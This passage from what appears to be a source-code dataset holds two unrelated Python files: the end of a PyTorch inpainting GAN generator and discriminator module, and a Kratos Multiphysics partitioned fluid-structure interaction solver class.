self).__init__()\n self.use_cuda = use_cuda\n self.device_ids = device_ids\n\n # 3 x 256 x 256\n self.conv1 = gen_conv(input_dim, cnum, 5, 1, 2)\n self.conv2_downsample = gen_conv(cnum, cnum, 3, 2, 1)\n # cnum*2 x 128 x 128\n self.conv3 = gen_conv(cnum, cnum * 2, 3, 1, 1)\n self.conv4_downsample = gen_conv(cnum * 2, cnum * 2, 3, 2, 1)\n # cnum*4 x 64 x 64\n self.conv5 = gen_conv(cnum * 2, cnum * 4, 3, 1, 1)\n self.conv6 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1)\n self.conv7_atrous = gen_conv(cnum * 4, cnum * 4, 3, 1, 2, rate=2)\n self.conv8_atrous = gen_conv(cnum * 4, cnum * 4, 3, 1, 4, rate=4)\n self.conv9_atrous = gen_conv(cnum * 
4, cnum * 4, 3, 1, 8, rate=8)\n self.conv10_atrous = gen_conv(cnum * 4, cnum * 4, 3, 1, 16, rate=16)\n # attention branch\n # 3 x 256 x 256\n self.pmconv1 = gen_conv(input_dim, cnum, 5, 1, 2)\n self.pmconv2_downsample = gen_conv(cnum, cnum, 3, 2, 1)\n # cnum*2 x 128 x 128\n self.pmconv3 = gen_conv(cnum, cnum * 2, 3, 1, 1)\n self.pmconv4_downsample = gen_conv(cnum * 2, cnum * 4, 3, 2, 1)\n # cnum*4 x 64 x 64\n self.pmconv5 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1)\n self.pmconv6 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1, activation='relu')\n self.contextul_attention = GlobalAttention(in_dim=128)\n self.pmconv9 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1)\n self.pmconv10 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1)\n self.allconv11 = gen_conv(cnum * 8, cnum * 4, 3, 1, 1)\n self.allconv12 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1)\n self.allconv13 = gen_conv(cnum * 4, cnum * 2, 3, 1, 1)\n self.allconv14 = gen_conv(cnum * 2, cnum * 2, 3, 1, 1)\n self.allconv15 = gen_conv(cnum * 2, cnum, 3, 1, 1)\n self.allconv16 = gen_conv(cnum, cnum // 2, 3, 1, 1)\n self.allconv17 = gen_conv(cnum // 2, 3, 3, 1, 1, activation='none')\n\n def forward(self, xin, mask):\n # For indicating the boundaries of images\n ones = torch.ones(xin.size(0), 1, xin.size(2), xin.size(3))\n if self.use_cuda:\n ones = ones.cuda()\n mask = mask.cuda()\n # conv branch\n xnow = torch.cat([xin, ones, mask], dim=1)\n x = self.conv1(xnow)\n x = self.conv2_downsample(x)\n x = self.conv3(x)\n x = self.conv4_downsample(x)\n x = self.conv5(x)\n x = self.conv6(x)\n x = self.conv7_atrous(x)\n x = self.conv8_atrous(x)\n x = self.conv9_atrous(x)\n x = self.conv10_atrous(x)\n x_hallu = x\n # attention branch\n x = self.pmconv1(xnow)\n x = self.pmconv2_downsample(x)\n x = self.pmconv3(x)\n x = self.pmconv4_downsample(x)\n x = self.pmconv5(x)\n x = self.pmconv6(x)\n x = self.contextul_attention(x, x, mask)\n x = self.pmconv9(x)\n x = self.pmconv10(x)\n pm = x\n x = torch.cat([x_hallu, pm], dim=1)\n # merge two branches\n x = self.allconv11(x)\n x = self.allconv12(x)\n x = F.interpolate(x, scale_factor=2, mode='nearest')\n x = self.allconv13(x)\n x = self.allconv14(x)\n x = F.interpolate(x, scale_factor=2, mode='nearest')\n x = self.allconv15(x)\n x = self.allconv16(x)\n x = self.allconv17(x)\n x_stage1 = torch.clamp(x, -1., 1.)\n\n return x_stage1\n\n\n\nclass FineGenerator(nn.Module):\n def __init__(self, input_dim, cnum, use_cuda=True, device_ids=None):\n super(FineGenerator, self).__init__()\n self.use_cuda = use_cuda\n self.device_ids = device_ids\n\n # 3 x 256 x 256\n self.conv1 = gen_conv(input_dim, cnum, 5, 1, 2)\n self.conv2_downsample = gen_conv(cnum, cnum, 3, 2, 1)\n # cnum*2 x 128 x 128\n self.conv3 = gen_conv(cnum, cnum * 2, 3, 1, 1)\n self.conv4_downsample = gen_conv(cnum * 2, cnum * 2, 3, 2, 1)\n # cnum*4 x 64 x 64\n\n self.conv5 = gen_conv(cnum * 2, cnum * 4, 3, 1, 1)\n self.conv6 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1)\n\n self.conv7_atrous = gen_conv(cnum * 4, cnum * 4, 3, 1, 2, rate=2)\n self.conv8_atrous = gen_conv(cnum * 4, cnum * 4, 3, 1, 4, rate=4)\n self.conv9_atrous = gen_conv(cnum * 4, cnum * 4, 3, 1, 8, rate=8)\n self.conv10_atrous = gen_conv(cnum * 4, cnum * 4, 3, 1, 16, rate=16)\n\n # attention branch\n # 3 x 256 x 256\n self.pmconv1 = gen_conv(input_dim, cnum, 5, 1, 2)\n self.pmconv2_downsample = gen_conv(cnum, cnum, 3, 2, 1)\n # cnum*2 x 128 x 128\n self.pmconv3 = gen_conv(cnum, cnum * 2, 3, 1, 1)\n self.pmconv4_downsample = gen_conv(cnum * 2, cnum * 4, 3, 2, 1)\n # cnum*4 x 64 x 64\n self.pmconv5 = gen_conv(cnum * 4, cnum * 4, 3, 1, 
1)\n self.pmconv6 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1, activation='relu')\n self.contextul_attention = GlobalLocalAttention(in_dim=128)\n self.pmconv9 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1)\n self.pmconv10 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1)\n\n self.allconv11 = gen_conv(cnum * 8, cnum * 4, 3, 1, 1)\n self.allconv12 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1)\n\n self.allconv13 = gen_conv(cnum * 4, cnum * 2, 3, 1, 1)\n self.allconv14 = gen_conv(cnum * 2, cnum * 2, 3, 1, 1)\n self.allconv15 = gen_conv(cnum * 2, cnum, 3, 1, 1)\n self.allconv16 = gen_conv(cnum, cnum // 2, 3, 1, 1)\n\n self.allconv17 = gen_conv(cnum // 2, 3, 3, 1, 1, activation='none')\n\n def forward(self, xin, x_stage1, mask):\n x1_inpaint = x_stage1 * mask + xin * (1. - mask)\n # For indicating the boundaries of images\n ones = torch.ones(xin.size(0), 1, xin.size(2), xin.size(3))\n if self.use_cuda:\n ones = ones.cuda()\n mask = mask.cuda()\n # conv branch\n xnow = torch.cat([x1_inpaint, ones, mask], dim=1)\n x = self.conv1(xnow)\n x = self.conv2_downsample(x)\n x = self.conv3(x)\n x = self.conv4_downsample(x)\n x = self.conv5(x)\n x = self.conv6(x)\n x = self.conv7_atrous(x)\n x = self.conv8_atrous(x)\n x = self.conv9_atrous(x)\n x = self.conv10_atrous(x)\n x_hallu = x\n # attention branch\n x = self.pmconv1(xnow)\n x = self.pmconv2_downsample(x)\n x = self.pmconv3(x)\n x = self.pmconv4_downsample(x)\n x = self.pmconv5(x)\n x = self.pmconv6(x)\n x = self.contextul_attention(x,mask)\n x = self.pmconv9(x)\n x = self.pmconv10(x)\n pm = x\n x = torch.cat([x_hallu, pm], dim=1)\n # merge two branches\n x = self.allconv11(x)\n x = self.allconv12(x)\n x = F.interpolate(x, scale_factor=2, mode='nearest')\n x = self.allconv13(x)\n x = self.allconv14(x)\n x = F.interpolate(x, scale_factor=2, mode='nearest')\n x = self.allconv15(x)\n x = self.allconv16(x)\n x = self.allconv17(x)\n x_stage2 = torch.clamp(x, -1., 1.)\n\n return x_stage2\n\nclass GlobalDis(nn.Module):\n def __init__(self, config, use_cuda=True, device_ids=None):\n super(GlobalDis, self).__init__()\n self.input_dim = config['input_dim']\n self.cnum = config['ndf']\n self.use_cuda = use_cuda\n self.device_ids = device_ids\n\n self.dis_conv_module = DisConvModule(self.input_dim, self.cnum)\n # self.linear = nn.Linear(self.cnum * 4 * 8 * 8, 1)\n # self.dropout = nn.Dropout(p=0.2)\n\n def forward(self, x):\n x = self.dis_conv_module(x)\n # x = self.dropout(x)\n # x = x.view(x.size()[0], -1)\n # x = self.linear(x)\n\n return x\n\nclass DisConvModule(nn.Module):\n def __init__(self, input_dim, cnum, use_cuda=True, device_ids=None):\n super(DisConvModule, self).__init__()\n self.use_cuda = use_cuda\n self.device_ids = device_ids\n\n self.conv1 = dis_conv(input_dim, cnum, 5, 2, 2)\n self.conv2 = dis_conv(cnum, cnum * 2, 5, 2, 2)\n self.conv3 = dis_conv(cnum * 2, cnum * 4, 5, 2, 2)\n self.conv4 = dis_conv(cnum * 4, cnum * 4, 5, 2, 2)\n self.conv5 = dis_conv(cnum * 4, cnum * 4, 5, 2, 2)\n\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = self.conv5(x)\n\n\n return x\n\n\ndef gen_conv(input_dim, output_dim, kernel_size=3, stride=1, padding=0, rate=1,\n activation='elu'):\n return Conv2dBlock(input_dim, output_dim, kernel_size, stride,\n conv_padding=padding, dilation=rate,\n activation=activation)\n\n\ndef dis_conv(input_dim, output_dim, kernel_size=5, stride=2, padding=0, rate=1,\n activation='lrelu'):\n return Conv2dBlock(input_dim, output_dim, kernel_size, stride,\n conv_padding=padding, dilation=rate,\n 
activation=activation, weight_norm='sn')\n\n\nclass Conv2dBlock(nn.Module):\n def __init__(self, input_dim, output_dim, kernel_size, stride, padding=0,\n conv_padding=0, dilation=1, weight_norm='none', norm='none',\n activation='lrelu', pad_type='zeros', transpose=False):\n super(Conv2dBlock, self).__init__()\n self.use_bias = True\n # initialize padding\n if pad_type == 'reflect':\n self.pad = nn.ReflectionPad2d(padding)\n elif pad_type == 'replicate':\n self.pad = nn.ReplicationPad2d(padding)\n elif pad_type == 'zeros':\n self.pad = nn.ZeroPad2d(padding)\n elif pad_type == 'none':\n self.pad = None\n else:\n assert 0, \"Unsupported padding type: {}\".format(pad_type)\n\n # initialize normalization\n norm_dim = output_dim\n if norm == 'bn':\n self.norm = nn.BatchNorm2d(norm_dim)\n elif norm == 'in':\n self.norm = nn.InstanceNorm2d(norm_dim)\n elif norm == 'none':\n self.norm = None\n else:\n assert 0, \"Unsupported normalization: {}\".format(norm)\n\n if weight_norm == 'sn':\n self.weight_norm = spectral_norm_fn\n elif weight_norm == 'wn':\n self.weight_norm = weight_norm_fn\n elif weight_norm == 'none':\n self.weight_norm = None\n else:\n assert 0, \"Unsupported normalization: {}\".format(weight_norm)\n\n # initialize activation\n if activation == 'relu':\n self.activation = nn.ReLU(inplace=True)\n elif activation == 'elu':\n self.activation = nn.ELU(inplace=True)\n elif activation == 'lrelu':\n self.activation = nn.LeakyReLU(0.2, inplace=True)\n elif activation == 'prelu':\n self.activation = nn.PReLU()\n elif activation == 'selu':\n self.activation = nn.SELU(inplace=True)\n elif activation == 'tanh':\n self.activation = nn.Tanh()\n elif activation == 'none':\n self.activation = None\n else:\n assert 0, \"Unsupported activation: {}\".format(activation)\n\n # initialize convolution\n if transpose:\n self.conv = nn.ConvTranspose2d(input_dim, output_dim,\n kernel_size, stride,\n padding=conv_padding,\n output_padding=conv_padding,\n dilation=dilation,\n bias=self.use_bias)\n\n else:\n self.conv = nn.Conv2d(input_dim, output_dim, kernel_size, stride,\n padding=conv_padding, dilation=dilation,\n bias=self.use_bias, padding_mode=pad_type)\n\n if self.weight_norm:\n self.conv = self.weight_norm(self.conv)\n\n def forward(self, x):\n if self.pad:\n x = self.conv(self.pad(x))\n else:\n x = self.conv(x)\n if self.norm:\n x = self.norm(x)\n if self.activation:\n x = self.activation(x)\n return x\n","sub_path":"codes/models/modules/architectures/Global_arch.py","file_name":"Global_arch.py","file_ext":"py","file_size_in_byte":25227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"4214873","text":"from __future__ import print_function, absolute_import, division # makes KratosMultiphysics backward compatible with python 2.6 and 2.7\nfrom math import sqrt # Import the square root from python library\n\n# Import utilities\nfrom KratosMultiphysics.FSIApplication import NonConformant_OneSideMap # Import non-conformant mapper\nfrom KratosMultiphysics.FluidDynamicsApplication import python_solvers_wrapper_fluid # Import the fluid Python solvers wrapper\nfrom KratosMultiphysics.StructuralMechanicsApplication import python_solvers_wrapper_structural # Import the structure Python solvers wrapper\nfrom KratosMultiphysics.MeshMovingApplication import python_solvers_wrapper_mesh_motion # Import the mesh motion Python solvers wrapper\nfrom KratosMultiphysics.FSIApplication import convergence_accelerator_factory # Import the FSI convergence accelerator 
factory\n\n# Importing the Kratos Library\nimport KratosMultiphysics\nfrom KratosMultiphysics.python_solver import PythonSolver\n\n# Import applications\nimport KratosMultiphysics.FSIApplication as KratosFSI\nimport KratosMultiphysics.StructuralMechanicsApplication as KratosStructural\n\ndef CreateSolver(model, project_parameters):\n return PartitionedFSIBaseSolver(model, project_parameters)\n\nclass PartitionedFSIBaseSolver(PythonSolver):\n\n def _ValidateSettings(self, project_parameters):\n default_settings = KratosMultiphysics.Parameters(\"\"\"\n {\n \"echo_level\": 0,\n \"parallel_type\": \"OpenMP\",\n \"solver_type\": \"partitioned\",\n \"coupling_scheme\": \"dirichlet_neumann\",\n \"structure_solver_settings\": {\n },\n \"fluid_solver_settings\":{\n },\n \"mesh_solver_settings\":{\n },\n \"coupling_settings\":{\n }\n }\"\"\")\n\n project_parameters.ValidateAndAssignDefaults(default_settings)\n\n if not project_parameters[\"structure_solver_settings\"].Has(\"multi_point_constraints_used\"):\n project_parameters[\"structure_solver_settings\"].AddEmptyValue(\"multi_point_constraints_used\")\n project_parameters[\"structure_solver_settings\"][\"multi_point_constraints_used\"].SetBool(False)\n\n return project_parameters\n\n def __init__(self, model, project_parameters):\n\n # Validate settings\n project_parameters = self._ValidateSettings(project_parameters)\n\n # Call the base Python solver constructor\n super(PartitionedFSIBaseSolver,self).__init__(model, project_parameters)\n\n # Auxiliar variables\n self.parallel_type = self.settings[\"parallel_type\"].GetString()\n coupling_settings = self.settings[\"coupling_settings\"]\n self.max_nl_it = coupling_settings[\"nl_max_it\"].GetInt()\n self.nl_tol = coupling_settings[\"nl_tol\"].GetDouble()\n self.solve_mesh_at_each_iteration = coupling_settings[\"solve_mesh_at_each_iteration\"].GetBool()\n self.fluid_interface_submodelpart_name = coupling_settings[\"fluid_interfaces_list\"][0].GetString()\n self.structure_interface_submodelpart_name = coupling_settings[\"structure_interfaces_list\"][0].GetString()\n\n # Construct the structure solver\n self.structure_solver = python_solvers_wrapper_structural.CreateSolverByParameters(self.model, self.settings[\"structure_solver_settings\"], self.parallel_type)\n self._PrintInfoOnRankZero(\"::[PartitionedFSIBaseSolver]::\", \"Structure solver construction finished.\")\n\n # Construct the fluid solver\n self.fluid_solver = python_solvers_wrapper_fluid.CreateSolverByParameters(self.model, self.settings[\"fluid_solver_settings\"], self.parallel_type)\n self._PrintInfoOnRankZero(\"::[PartitionedFSIBaseSolver]::\", \"Fluid solver construction finished.\")\n\n # Construct the ALE mesh solver\n self.mesh_solver = python_solvers_wrapper_mesh_motion.CreateSolverByParameters(self.model, self.settings[\"mesh_solver_settings\"], self.parallel_type)\n self._PrintInfoOnRankZero(\"::[PartitionedFSIBaseSolver]::\", \"ALE mesh solver construction finished.\")\n self._PrintInfoOnRankZero(\"::[PartitionedFSIBaseSolver]::\", \"Partitioned FSI base solver construction finished.\")\n\n def GetMinimumBufferSize(self):\n # Get structure buffer size\n buffer_structure = self.structure_solver.GetMinimumBufferSize()\n # Get fluid buffer size\n buffer_fluid = self.fluid_solver.GetMinimumBufferSize()\n\n return max(buffer_structure,buffer_fluid)\n\n def AddVariables(self):\n ## Structure variables addition\n # Standard CSM variables addition\n self.structure_solver.AddVariables()\n\n ## Fluid variables addition\n # Standard CFD 
variables addition\n self.fluid_solver.AddVariables()\n self.fluid_solver.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.FORCE)\n self.fluid_solver.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.MESH_ACCELERATION) # TODO: This should be added in the mesh solvers\n # Mesh solver variables addition\n self.mesh_solver.AddVariables()\n\n ## FSIApplication variables addition\n NonConformant_OneSideMap.AddVariables(self.fluid_solver.main_model_part,self.structure_solver.main_model_part)\n self.fluid_solver.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VECTOR_PROJECTED)\n self.fluid_solver.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.FSI_INTERFACE_RESIDUAL)\n self.fluid_solver.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.FSI_INTERFACE_MESH_RESIDUAL)\n self.structure_solver.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.POSITIVE_MAPPED_VECTOR_VARIABLE)\n self.structure_solver.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.NEGATIVE_MAPPED_VECTOR_VARIABLE)\n self.structure_solver.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VECTOR_PROJECTED)\n\n def ImportModelPart(self):\n # Fluid and structure solvers ImportModelPart() call\n self.fluid_solver.ImportModelPart()\n self.structure_solver.ImportModelPart()\n\n def PrepareModelPart(self):\n # Get the minimum buffer size between the mesh, fluid and structure solvers\n self._GetAndSetMinimumBufferSize()\n # Fluid and structure solvers PrepareModelPart() call\n self.structure_solver.PrepareModelPart()\n self.fluid_solver.PrepareModelPart()\n self.mesh_solver.PrepareModelPart()\n\n def AddDofs(self):\n # Add DOFs structure\n self.structure_solver.AddDofs()\n\n # Add DOFs fluid\n self.fluid_solver.AddDofs()\n self.mesh_solver.AddDofs()\n\n def Initialize(self):\n err_msg = 'Calling the base partitioned FSI solver Initialize() method.\\n'\n err_msg += 'Implement the custom Initialize() method in the derived solver.'\n raise Exception(err_msg)\n\n def AdvanceInTime(self, current_time):\n fluid_new_time = self.fluid_solver.AdvanceInTime(current_time)\n structure_new_time = self.structure_solver.AdvanceInTime(current_time)\n\n if abs(fluid_new_time - structure_new_time) > 1e-12:\n err_msg = 'Fluid new time is: ' + str(fluid_new_time) + '\\n'\n err_msg += 'Structure new time is: ' + str(structure_new_time) + '\\n'\n err_msg += 'No substepping has been implemented yet. 
Fluid and structure time must coincide.'\n raise Exception(err_msg)\n\n return fluid_new_time\n\n def InitializeSolutionStep(self):\n # Initialize solution step of fluid, structure and coupling solvers\n self.structure_solver.InitializeSolutionStep()\n self.fluid_solver.InitializeSolutionStep()\n self.mesh_solver.InitializeSolutionStep()\n self._GetConvergenceAccelerator().InitializeSolutionStep()\n\n def Predict(self):\n # Perform fluid and structure solvers predictions\n self.structure_solver.Predict()\n self.fluid_solver.Predict()\n self.mesh_solver.Predict()\n\n def GetComputingModelPart(self):\n err_msg = 'Calling GetComputingModelPart() method in a partitioned solver.\\n'\n err_msg += 'Specify the domain of interest by calling:\\n'\n err_msg += '\\t- GetFluidComputingModelPart()\\n'\n err_msg += '\\t- GetStructureComputingModelPart()\\n'\n raise Exception(err_msg)\n\n def GetFluidComputingModelPart(self):\n return self.fluid_solver.GetComputingModelPart()\n\n def GetStructureComputingModelPart(self):\n return self.structure_solver.GetComputingModelPart()\n\n def GetOutputVariables(self):\n pass\n\n def SaveRestart(self):\n pass\n\n def SolveSolutionStep(self):\n ## Solvers initialization\n self.InitializeSolutionStep()\n\n ## Solvers predict\n self.Predict()\n\n ## Compute mesh prediction ##\n if (self.double_faced_structure):\n self._ComputeMeshPredictionDoubleFaced()\n else:\n self._ComputeMeshPredictionSingleFaced()\n\n ## Non-Linear interface coupling iteration ##\n nl_it = 0\n is_converged = False\n while not is_converged:\n nl_it += 1\n self._PrintInfoOnRankZero(\"\",\"\\tFSI non-linear iteration = \", nl_it)\n\n self.fluid_solver.main_model_part.ProcessInfo[KratosMultiphysics.CONVERGENCE_ACCELERATOR_ITERATION] = nl_it\n self.structure_solver.main_model_part.ProcessInfo[KratosMultiphysics.CONVERGENCE_ACCELERATOR_ITERATION] = nl_it\n\n self._GetConvergenceAccelerator().InitializeNonLinearIteration()\n\n # Solve the mesh problem as well as the fluid problem\n self._SolveMeshAndFluid()\n\n # Solve the structure problem and computes the displacement residual\n if (self.double_faced_structure):\n self._SolveStructureDoubleFaced()\n dis_residual = self._ComputeDisplacementResidualDoubleFaced()\n else:\n self._SolveStructureSingleFaced()\n dis_residual = self._ComputeDisplacementResidualSingleFaced()\n\n # Residual computation\n nl_res_norm = self.fluid_solver.main_model_part.ProcessInfo[KratosMultiphysics.FSI_INTERFACE_RESIDUAL_NORM]\n interface_dofs = self.partitioned_fsi_utilities.GetInterfaceResidualSize(self._GetFluidInterfaceSubmodelPart())\n\n # Check convergence\n if nl_res_norm/sqrt(interface_dofs) < self.nl_tol:\n is_converged = True\n self._GetConvergenceAccelerator().FinalizeNonLinearIteration()\n self._PrintInfoOnRankZero(\"\",\"\\tNon-linear iteration convergence achieved\")\n self._PrintInfoOnRankZero(\"\",\"\\tTotal non-linear iterations: \", nl_it, \" |res|/sqrt(nDOFS) = \", nl_res_norm/sqrt(interface_dofs))\n break\n else:\n # If convergence is not achieved, perform the correction of the prediction\n self._PrintInfoOnRankZero(\"\",\"\\tResidual computation finished. 
|res|/sqrt(nDOFS) = \", nl_res_norm/sqrt(interface_dofs))\n                self._GetConvergenceAccelerator().UpdateSolution(dis_residual, self.iteration_value)\n                self._GetConvergenceAccelerator().FinalizeNonLinearIteration()\n\n                if (nl_it == self.max_nl_it):\n                    self._PrintWarningOnRankZero(\"\",\"\\tFSI NON-LINEAR ITERATION CONVERGENCE NOT ACHIEVED\")\n                    break\n\n        ## Compute the mesh residual as a final check (it is expected to be 0)\n        mesh_res_norm = self.partitioned_fsi_utilities.ComputeInterfaceResidualNorm(\n            self._GetFluidInterfaceSubmodelPart(),\n            KratosMultiphysics.VELOCITY,\n            KratosMultiphysics.MESH_VELOCITY,\n            KratosMultiphysics.FSI_INTERFACE_MESH_RESIDUAL,\n            \"nodal\")\n        self._PrintInfoOnRankZero(\"\",\"\\tNL residual norm: \", nl_res_norm)\n        self._PrintInfoOnRankZero(\"\",\"\\tMesh residual norm: \", mesh_res_norm)\n\n        return is_converged\n\n    def FinalizeSolutionStep(self):\n        self.structure_solver.FinalizeSolutionStep()\n        self.fluid_solver.FinalizeSolutionStep()\n        self.mesh_solver.FinalizeSolutionStep()\n        self._GetConvergenceAccelerator().FinalizeSolutionStep()\n\n    def SetEchoLevel(self, structure_echo_level, fluid_echo_level):\n        self.structure_solver.SetEchoLevel(structure_echo_level)\n        self.fluid_solver.SetEchoLevel(fluid_echo_level)\n\n    def SetTimeStep(self, step):\n        self.fluid_solver.main_model_part.ProcessInfo.SetValue(KratosMultiphysics.STEP, step)\n        self.structure_solver.main_model_part.ProcessInfo.SetValue(KratosMultiphysics.STEP, step)\n\n    def Clear(self):\n        self.fluid_solver.Clear()\n        self.structure_solver.Clear()\n\n    def Check(self):\n        self.fluid_solver.Check()\n        self.structure_solver.Check()\n\n    #######################################################################\n    ############## PRIVATE METHODS SECTION ##############\n    #######################################################################\n\n    # This method is to be overwritten in the MPI solver\n    def _PrintInfoOnRankZero(self, *args):\n        KratosMultiphysics.Logger.PrintInfo(\" \".join(map(str, args)))\n\n    # This method is to be overwritten in the MPI solver\n    def _PrintWarningOnRankZero(self, *args):\n        KratosMultiphysics.Logger.PrintWarning(\" \".join(map(str, args)))\n\n    # This method returns the convergence accelerator.\n    # If it is not created yet, it calls the _CreateConvergenceAccelerator first\n    def _GetConvergenceAccelerator(self):\n        if not hasattr(self, '_convergence_accelerator'):\n            self._convergence_accelerator = self._CreateConvergenceAccelerator()\n        return self._convergence_accelerator\n\n    # This method constructs the convergence accelerator coupling utility\n    def _CreateConvergenceAccelerator(self):\n        convergence_accelerator = convergence_accelerator_factory.CreateConvergenceAccelerator(self.settings[\"coupling_settings\"][\"coupling_strategy_settings\"])\n        self._PrintInfoOnRankZero(\"::[PartitionedFSIBaseSolver]::\", \"Coupling strategy construction finished.\")\n        return convergence_accelerator\n\n    # This method finds the maximum buffer size between mesh,\n    # fluid and structure solvers and sets it to all the solvers.\n    def _GetAndSetMinimumBufferSize(self):\n        fluid_buffer_size = self.fluid_solver.min_buffer_size\n        mesh_buffer_size = self.mesh_solver.settings[\"buffer_size\"].GetInt()\n        str_buffer_size = self.structure_solver.settings[\"buffer_size\"].GetInt()\n\n        buffer_size = max(fluid_buffer_size, mesh_buffer_size)\n        buffer_size = max(buffer_size, str_buffer_size)\n\n        self.fluid_solver.min_buffer_size = buffer_size\n        self.mesh_solver.settings[\"buffer_size\"].SetInt(buffer_size)\n        
self.structure_solver.settings[\"buffer_size\"].SetInt(buffer_size)\n\n def _GetFluidInterfaceSubmodelPart(self):\n # Returns the fluid interface submodelpart that will be used in the residual minimization\n return self.fluid_solver.main_model_part.GetSubModelPart(self.fluid_interface_submodelpart_name)\n\n def _GetFluidPositiveInterfaceSubmodelPart(self):\n mapper_settings = self.settings[\"coupling_settings\"][\"mapper_settings\"]\n\n # Get the fluid interface faces submodelpart names\n for mapper_id in range(2):\n if (mapper_settings[mapper_id][\"mapper_face\"].GetString() == \"Positive\"):\n pos_face_submodelpart_name = mapper_settings[mapper_id][\"fluid_interface_submodelpart_name\"].GetString()\n\n # Returns the fluid positive interface submodelpart\n return self.fluid_solver.main_model_part.GetSubModelPart(pos_face_submodelpart_name)\n\n def _GetFluidNegativeInterfaceSubmodelPart(self):\n mapper_settings = self.settings[\"coupling_settings\"][\"mapper_settings\"]\n\n # Get the fluid interface faces submodelpart names\n for mapper_id in range(2):\n if (mapper_settings[mapper_id][\"mapper_face\"].GetString() == \"Negative\"):\n neg_face_submodelpart_name = mapper_settings[mapper_id][\"fluid_interface_submodelpart_name\"].GetString()\n\n # Returns the fluid negative interface submodelpart\n return self.fluid_solver.main_model_part.GetSubModelPart(neg_face_submodelpart_name)\n\n def _GetStructureInterfaceSubmodelPart(self):\n # Returns the structure interface submodelpart that will be used in the residual minimization\n return self.structure_solver.main_model_part.GetSubModelPart(self.structure_interface_submodelpart_name)\n\n def _GetDomainSize(self):\n fluid_domain_size = self.fluid_solver.main_model_part.ProcessInfo[KratosMultiphysics.DOMAIN_SIZE]\n structure_domain_size = self.structure_solver.main_model_part.ProcessInfo[KratosMultiphysics.DOMAIN_SIZE]\n\n if fluid_domain_size !=structure_domain_size:\n raise(\"ERROR: Solid domain size and fluid domain size are not equal!\")\n\n return fluid_domain_size\n\n def _ComputeDeltaTime(self):\n fluid_time_step = self.fluid_solver._ComputeDeltaTime()\n structure_time_step = self.structure_solver.ComputeDeltaTime()\n\n if abs(fluid_time_step - structure_time_step) > 1e-12:\n err_msg = 'Fluid time step is: ' + str(fluid_time_step) + '\\n'\n err_msg += 'Structure time step is: ' + str(structure_time_step) + '\\n'\n err_msg += 'No substepping has been implemented yet. 
Fluid and structure time step must coincide.'\n raise Exception(err_msg)\n\n return fluid_time_step\n\n def _GetNodalUpdateUtilities(self):\n structure_time_scheme = self.structure_solver.settings[\"scheme_type\"].GetString()\n if (structure_time_scheme == \"newmark\"):\n damp_factor_m = 0.0\n elif (structure_time_scheme == \"bossak\"):\n damp_factor_m = -0.3\n else:\n err_msg = \"Requested structure time scheme type \\\"\" + structure_time_scheme + \"\\\" is not available!\\n\"\n err_msg += \"Available options are: \\\"newmark\\\", \\\"bossak\\\", \\\"relaxation\\\"\"\n raise Exception(err_msg)\n\n if (self.domain_size == 2):\n return KratosFSI.NodalUpdateNewmark2D(damp_factor_m)\n else:\n return KratosFSI.NodalUpdateNewmark3D(damp_factor_m)\n\n def _GetPartitionedFSIUtilities(self):\n if (self.domain_size == 2):\n return KratosFSI.PartitionedFSIUtilitiesArray2D()\n else:\n return KratosFSI.PartitionedFSIUtilitiesArray3D()\n\n def _SetUpMapper(self):\n # Recall, to set the INTERFACE flag in both the fluid and solid interface before the mapper construction\n search_radius_factor = 2.0\n mapper_max_iterations = 200\n mapper_tolerance = 1e-12\n\n mappers_settings = self.settings[\"coupling_settings\"][\"mapper_settings\"]\n\n if (mappers_settings.size() == 1):\n fluid_submodelpart_name = mappers_settings[0][\"fluid_interface_submodelpart_name\"].GetString()\n structure_submodelpart_name = mappers_settings[0][\"structure_interface_submodelpart_name\"].GetString()\n\n fluid_submodelpart = self.fluid_solver.main_model_part.GetSubModelPart(fluid_submodelpart_name)\n structure_submodelpart = self.structure_solver.main_model_part.GetSubModelPart(structure_submodelpart_name)\n\n self.interface_mapper = NonConformant_OneSideMap.NonConformant_OneSideMap(fluid_submodelpart,\n structure_submodelpart,\n search_radius_factor,\n mapper_max_iterations,\n mapper_tolerance)\n\n self.double_faced_structure = False\n\n elif (mappers_settings.size() == 2):\n # Get the fluid interface faces submodelpart names\n for mapper_id in range(2):\n if (mappers_settings[mapper_id][\"mapper_face\"].GetString() == \"Positive\"):\n pos_face_submodelpart_name = mappers_settings[mapper_id][\"fluid_interface_submodelpart_name\"].GetString()\n elif (mappers_settings[mapper_id][\"mapper_face\"].GetString() == \"Negative\"):\n neg_face_submodelpart_name = mappers_settings[mapper_id][\"fluid_interface_submodelpart_name\"].GetString()\n else:\n raise Exception(\"Unique mapper flag has been set but more than one mapper exist in mapper_settings.\")\n # Get the structure submodelpart name\n structure_submodelpart_name = mappers_settings[0][\"structure_interface_submodelpart_name\"].GetString()\n\n # Grab the interface submodelparts\n pos_fluid_submodelpart = self.fluid_solver.main_model_part.GetSubModelPart(pos_face_submodelpart_name)\n neg_fluid_submodelpart = self.fluid_solver.main_model_part.GetSubModelPart(neg_face_submodelpart_name)\n structure_submodelpart = self.structure_solver.main_model_part.GetSubModelPart(structure_submodelpart_name)\n\n self.interface_mapper = NonConformant_OneSideMap.NonConformantTwoFaces_OneSideMap(pos_fluid_submodelpart,\n neg_fluid_submodelpart,\n structure_submodelpart,\n search_radius_factor,\n mapper_max_iterations,\n mapper_tolerance)\n\n self.double_faced_structure = True\n\n else:\n raise Exception(\"Case with more than 2 